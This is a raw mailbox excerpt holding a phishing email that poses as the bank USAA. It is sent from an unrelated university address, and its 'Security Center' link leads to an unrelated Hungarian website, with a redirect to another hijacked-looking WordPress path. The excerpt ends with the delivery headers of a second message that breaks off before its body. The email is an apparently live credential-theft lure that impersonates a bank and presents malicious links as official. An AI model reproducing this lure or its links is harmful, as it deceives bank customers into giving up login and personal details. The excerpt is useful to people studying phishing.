From: "USAA" <pnc@yorku.ca>
Date: Mon, 02 Jan 2017 12:21:05 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 2

You will not see this in a MIME-aware mail reader.
--===============0455926785==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body



Dear Customer,
To learn how USAA protects your information, visit our Security Center now.=
 We value your business and are committed to keeping your accounts and pers=
onal information safe and secure.
Thank you,
USAA

--===============0455926785==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><div id=3D"m_-2765544228704214366:1vo" style=3D"over=
flow:hidden"><div><img src=3D"https://ci4.googleusercontent.com/proxy/U0RKK=
-68hu6LgjAfA1jBqJ14QGkCUxkkcuzfVgJZRMAgGp-B4wCEM2WQuMmqMY_hhx8klDZRxSzTmfy8=
kyoLfS7w2CCXC2cOlPA8E-CRLgExdwOLA6j852wY=3Ds0-d-e1-ft#https://content.usaa.=
com/mcontent/static_assets/Media/email_logo.gif"><br><br></div>Dear Custome=
r,<br><div><p style=3D"color:rgb(51,51,51);font-family:Verdana,sans-serif;f=
ont-size:12px;font-style:normal;font-variant:normal;font-weight:normal;lett=
er-spacing:normal;line-height:18px;text-indent:0px;text-transform:none;whit=
e-space:normal;word-spacing:0px;background-color:rgb(255,255,255)">To learn=
 how USAA protects your information, visit our<span>&nbsp;</span><a href=3D=
"http://agriareklam.hu/modules/mod_archive/re.htm" style=3D"color:blue;text=
-decoration:underline" target=3D"_blank" data-saferedirecturl=3D"https://ww=
w.google.com/url?hl=3Den&amp;q=3Dhttps://indiemediapartners.com/wp-includes=
/js/jcrop/blessing.html&amp;source=3Dgmail&amp;ust=3D1483452847548000&amp;u=
sg=3DAFQjCNGuf-cLe8gKJKlRFi71_YnjbiWVvg">Security Center</a><span> </span>n=
ow. We value your business and are committed to keeping your accounts and p=
ersonal information safe and secure.</p><p style=3D"color:rgb(51,51,51);fon=
t-family:Verdana,sans-serif;font-size:12px;font-style:normal;font-variant:n=
ormal;font-weight:normal;letter-spacing:normal;line-height:18px;text-indent=
:0px;text-transform:none;white-space:normal;word-spacing:0px;margin-bottom:=
1em;background-color:rgb(255,255,255)">Thank you,<br>USAA</p></div></div></=
html>
--===============0455926785==--

From jose@monkey.org Tue Jan  3 16:49:53 2017 +0000
Return-Path: nconner@deltastate.edu
Delivered-To: jose@monkey.org
X-FDA: 72363373866.10.hat58_1bf44d3c5d45b
X-Spam-Summary: 50,0,0,4d497bc84b2a1daa,d41d8cd98f00b204,nconner@deltastate.edu,:nconner@deltastate.edu,RULES_HIT:10:41:72:355:379:474:582:599:960:962:967:969:973:978:982:983:988:989:1152:1158:1189:1208:1221:1260:1261:1263:1313:1314:1345:1359:1381:1431:1436:1437:1516:1517:1518:1535:1542:1575:1588:1589:1592:1594:1711:1730:1776:1792:1803:2194:2199:2525:2527:2551:2553:2557:2561:2564:2682:2685:2693:2859:2890:2914:2915:2921:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3521:3522:3523:3586:3769:3865:3867:3868:3870:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4117:4362:4860:5007:6117:6261:6650:6684:6703:7576:7688:7875:8518:8603:8885:8957:9025:9040:9059:9111:9411:9545:9855:9908:10004:10049:10215:10346:10400:11257:11656:11657:11658:11788:11914:12043:12050:12051:12291:12438:12519:12555:12679:12683:12855:12895:13132:13139:13231:13237:13439:14093:14096:14110:14181:14659:14721:14828:14885:21080:21433:21450:21451:30001:30003:30022:30026:30
X-HE-Tag: hat58_1bf44d3c5d45b
X-Filterd-Recvd-Size: 6059
Received: from dsumail1.deltastate.edu (mail.deltastate.edu [209.147.241.5])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Tue,  3 Jan 2017 16:49:51 +0000 (UTC)
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: =?us-ascii?q?A3GgawDM1WtY/wEAAAAoNQ4CgxFGAQEBA?=
 =?us-ascii?q?QEfXz89AQEVmS6IaIJeiCaCLIJDSYJQgRl2e0pDASWCXgGDHQKBS0ATAQIBAQE?=
 =?us-ascii?q?BAQEBA18UgV0BAQFYAQEwBCYdBwNVAk8bAQEBAQMHOAkRMAIBBQMECgMEAQELC?=
 =?us-ascii?q?wQVHBYdCAEBBBEKiAJmDiytOYJrWoIkMwGBDYQaAQaCGQEBAQEBBQEBAQEkDQK?=
 =?us-ascii?q?GNoRhhBgQAgEdPYEPAgGBYIIwBYEOi32COYVFhXSGVIRIToVUCoFrhQiJWJI9D?=
 =?us-ascii?q?xEBN2gfFg2BC4MBgUQ7PgMDeREDAQGFIAINCwEBAQMBAQMBBIEGAXcVAQEB?=
X-IPAS-Result: =?us-ascii?q?A3GgawDM1WtY/wEAAAAoNQ4CgxFGAQEBAQEfXz89AQEVmS6?=
 =?us-ascii?q?IaIJeiCaCLIJDSYJQgRl2e0pDASWCXgGDHQKBS0ATAQIBAQEBAQEBA18UgV0BA?=
 =?us-ascii?q?QFYAQEwBCYdBwNVAk8bAQEBAQMHOAkRMAIBBQMECgMEAQELCwQVHBYdCAEBBBE?=
 =?us-ascii?q?KiAJmDiytOYJrWoIkMwGBDYQaAQaCGQEBAQEBBQEBAQEkDQKGNoRhhBgQAgEdP?=
 =?us-ascii?q?YEPAgGBYIIwBYEOi32COYVFhXSGVIRIToVUCoFrhQiJWJI9DxEBN2gfFg2BC4M?=
 =?us-ascii?q?BgUQ7PgMDeREDAQGFIAINCwEBAQMBAQMBBIEGAXcVAQEB?=
X-IronPort-AV: E=Sophos;i="5.33,455,1477976400"; 
   d="scan'208,217";a="4948937"
Received: from silver.deltastate.edu (HELO webmail.deltastate.edu) ([10.1.1.148])
  by dsumail1.deltastate.edu with ESMTP; 03 Jan 2017 10:49:49 -0600
Received: from Pewter.deltastate.edu ([10.1.1.159]) by Silver.deltastate.edu
 ([::1]) with mapi id 14.03.0174.001; Tue, 3 Jan 2017 10:08:08 -0600
